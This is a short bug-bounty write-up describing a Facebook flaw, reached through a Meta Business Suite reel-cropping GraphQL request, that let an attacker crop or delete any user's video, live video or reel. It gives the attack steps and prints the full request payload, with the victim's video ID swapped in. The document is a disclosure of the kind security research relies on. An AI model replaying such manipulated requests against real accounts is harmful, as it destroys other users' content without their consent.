Published On: 28 Dec 2022
In Meta business suite their is a new feature where you can create a reel. We are also able to trim and crop the reel.
The graphql request responsible of cropping and trimming the reel is vulnerable and can be manipulated to crop any video on Facebook.
I was able to delete any video, live video and reels uploaded on Facebook.
Step
1
UserAttacker
UserVictim
From UserVictim upload any video on your Facebook profile.
Step
2
From UserAttacker get your Facebook android app access token to use it later.
Step
3
Perform the below graphql POST request using UserAttacker access token and manipulate the video_id to the video id of step 1 :
{ "variables": { "videoClipsTimestamps": { "start_time_in_sec": 0.706, "end_time_in_sec": 7.721354166666667 }, "videoID": "VIDEO_ID_HERE", "reframeAspectRatios": [ { "aspect_ratio_denominator": 11, "aspect_ratio_numerator": 1 } ], "aggressiveness": 0 }, "doc_id": "8426940007331645" }
Step
4
https://bugreader.com/social/write-ups-general-delete-any-video-or-reel-on-facebook-11-250--100965